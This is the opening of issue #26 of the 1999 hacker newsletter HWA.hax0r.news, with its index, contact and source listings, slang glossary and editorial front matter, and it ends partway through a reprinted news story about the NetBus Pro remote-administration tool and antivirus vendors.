Copy Link
Add to Bookmark
Report

hwa-hn26

eZine's profile picture
Published in 
HWA
 · 5 years ago

  

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 26 Volume 1 1999 July 24th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

http://www.fourmilab.to/hackdiet/www/hackdietf.html

- The Hacker's Diet:
How to lose weight and hair through stress and poor nutrition


And joke of the week:

http://support.microsoft.com/support/kb/articles/q149/9/62.asp



HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/ * DOWN *
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm






SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #26

=-----------------------------------------------------------------------=



We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #26

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. NetBus suffers same industry pitfalls as Bo2k....................
04.0 .. Spreading Viruses Equal A Terrorist Attack ......................
05.0 .. Y2K Bug Fixes May Cause Other Problems ..........................
06.0 .. Security Fears are Slowing UK E-Commerce ........................
07.0 .. More Defc0n than you can shake three sticks at...................
08.0 .. How to Look Like a Hacker.(quite hilarious really)...............
09.0 .. AV Vendors Still Scrambling Over BO2K ...........................
10.0 .. The Back Orifice 2000 Controversy................................
11.0 .. Year Old IIS Hole Still Causing Problems ........................
12.0 .. NCIC 2000 Now Online ............................................
13.0 .. E-commerce Increases Security Risk ..............................
14.0 .. Cyberspace Relatively Safe ......................................
15.0 .. AntiOnline Under Investigation ..................................
16.0 .. Parse Defcon Video Available ....................................
17.0 .. cDc Challenges Microsoft to Recall SMS (wicked!).................
18.0 .. BlackHat Insiders Want to Quit Security Biz......................
19.0 .. Attrition Closes Down Negation ..................................
20.0 .. ISS Offers Cracking Tools .......................................
21.0 .. IBM Researching Proactive Security ..............................
22.0 .. InET Issue #3 ...................................................
23.0 .. National ID Card Law Set to be Enacted ..........................
24.0 .. Local Agencies Not Concerned About Computer Intrusions ..........
25.0 .. Microfraud Becomes Big Deal .....................................
26.0 .. China Arrests One After Posting to Internet .....................
27.0 .. The Truth About Abe - MTV "Punk Hacker" .........................
28.0 .. This is just silly: BO2Kfun Page Shut Down From Overuse .......
29.0 .. Man Sentenced for Using Cell Phone ..............................
30.0 .. HILLARY CLINTON AND HACKERS......................................
31.0 .. SAMBA 2.0.5 SECURITY FIXES.......................................
32.0 .. SECURITY STANDARDS FOR BANKING...................................
33.0 .. What makes UNIX users so smart? .................................
34.0 .. Statement by Legions of the Underground Released ................
35.0 .. L0pht Releases Public Beta of AntiSniff .........................
36.0 .. Bill to Limit Crypto Exports Approved ...........................
37.0 .. Russian and Ukrainian Govs Monitor Internet Communications ......
38.0 .. Here we go again, Mitnick to be Sentenced on Monday (Supposedly)
39.0 .. Virus Infestations on the Rise (?)...............................
40.0 .. Do Handheld Electronics cause Problems with Avionics? ...........
41.0 .. Alert: RDS IIS vulnerability/fix ................................
42.0 .. Highschool crackers..............................................
43.0 .. Unauthorized Access to IIS Servers through ODBC Data Access with RDS
44.0 .. Who's fault is the Y2K bug?. ....................................
45.0 .. CERT ADVISORY CA-99-09...........................................
46.0 .. Tracking Criminals With New Technology...........................
47.0 .. 3Com HiPer Arcs Community Name Vulnerability.....................
48.0 .. Aleph One in Tokyo...............................................
49.0 .. Windows2000 introduces Public Key Encryption.....................
50.0 .. Remote OS detection via TCP/IP Stack FingerPrinting (Extra)......

=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
Ha.Ha .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.


Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*


If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. <a href="
http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="
http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="
http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="
http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ .(lophtcrack)..<a href="
http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .(daily news ).........<a href="
http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="
http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="
http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="
http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="
http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="
http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="
http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="
http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="
http://www.innerpulse.com/>http://www.innerpulse.com</a>
News/Techie news site.............<a href="http://www.slashdot.org/>http://www.slashdot.org</a>



+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="
http://www.cnn.com/SEARCH/">Link</a>

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>

http://www.ottawacitizen.com/business/
<a href="
http://www.ottawacitizen.com/business/">Link</a>

http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="
http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>

http://www.zdnet.com/zdtv/cybercrime/
<a href="
http://www.zdnet.com/zdtv/cybercrime/">Link</a>

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="
http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>

http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="
http://freespeech.org/eua/">Link</a>

http://ech0.cjb.net ech0 Security
<a href="
http://ech0.cjb.net">Link</a>

http://axon.jccc.net/hir/ Hackers Information Report
<a href="
http://axon.jccc.net/hir/">Link</a>

http://net-security.org Net Security
<a href="
http://net-security.org">Link</a>

http://www.403-security.org Daily news and security related site
<a href="
http://www.403-security.org">Link</a>


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "
noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "
CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "
Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "
subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media



Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland


Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "
new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "
is not equal to" or "does not equal"
ASC(247) "
wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "
script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "
Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "
Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "
you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "
telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "
w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix

Also shouts to; kimblerj and xochitl13 who dropped off postcards, tnx guys!


Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (watch yer back)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"
What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99



+++ When was the last time you backed up your important data?

++ NO DINERO, NO DOMAIN (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20878.html

Network Solutions will demand advance payments for domain
name registrations in a move designed to squelch
cyber-squatters. By Debbi Gardiner.



Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("
Read commented source!\n\n");

/*
* Issue #26
*
* What can I say? the press is full of bullshit stories
* about defcon and bo2k, guess nothing else happened
* lately.... slim pickings indeed.
*
* hwa@press.usmc.net
*
*/
printf ("
EoF.\n");
}



Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 NetBus suffers same industry pitfalls as Bo2k
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

NetBus Pro - Remote Admin Shareware or Evil Tool


contributed by sprfish
NetBus is facing similar problems as Back Orifice from
AntiVirus companies. NetBus, a $12 shareware program,
is classified as a 'hacker tool' and is detected and
removed by all of the major AntiVirus software makers.
The authors of NetBus have contemplated suing the AV
companies claiming that they are trying to protect their
own remote administration programs while squashing the
competition.

MSNBC
http://www.msnbc.com/news/290766.asp


NetBus maker to sue anti-virus firms?
Back Orifice-like tool is removed by virus software;
authors say that’s hurting sales, and the tool’s legit
By Bob Sullivan
MSNBC
July 16 — While one “remote administration tool,”
Back Orifice, stole headlines last week, authors of
the another well-known back-door program,
NetBus Pro, were gearing up to sue for the right to
sell it. Anti-virus software currently detects and
removes NetBus, another program that lets
intruders take control of a victim’s PC from
anywhere on the Internet. NetBus Pro authors,
who charge $12 for the product, say it’s a
legitimate software tool. They might sue anti-virus
vendors for interfering with their right to sell it

IT’S A STICKY STORY. The first version of NetBus
was a favorite among hackers — it even included easy ways
to taunt victims, such as buttons to open and close a victim’s
CD-ROM door.
Earlier this year, author Carl-Fredrik Neikter came out
with an updated version, which he said was redesigned to be
used as a professional “remote administration tool.” And he
started charging a $12 registration fee.
But anti-virus software companies, noting that NetBus
can still be used by hackers, treat the program like a virus.
That makes NetBus and any anti-virus program incompatible,
and NetBus Pro owners say that’s stifling their sales. Even
worse, according to Neikter’s partner Judson Spence, it’s
anti-competitive — he says the anti-virus companies are
squelching his product because it’s competition for their
remote administration software. Symantec, which makes
Norton’s AntiVirus Utility, sells remote administration tool
PC Anywhere for $159.
“On its face, it looks like a good case,” said attorney
Mark Rubin, who has been retained my NetBus.
“The product belongs to a corporation. It’s designed to
do a function. You’ve got another business telling people,
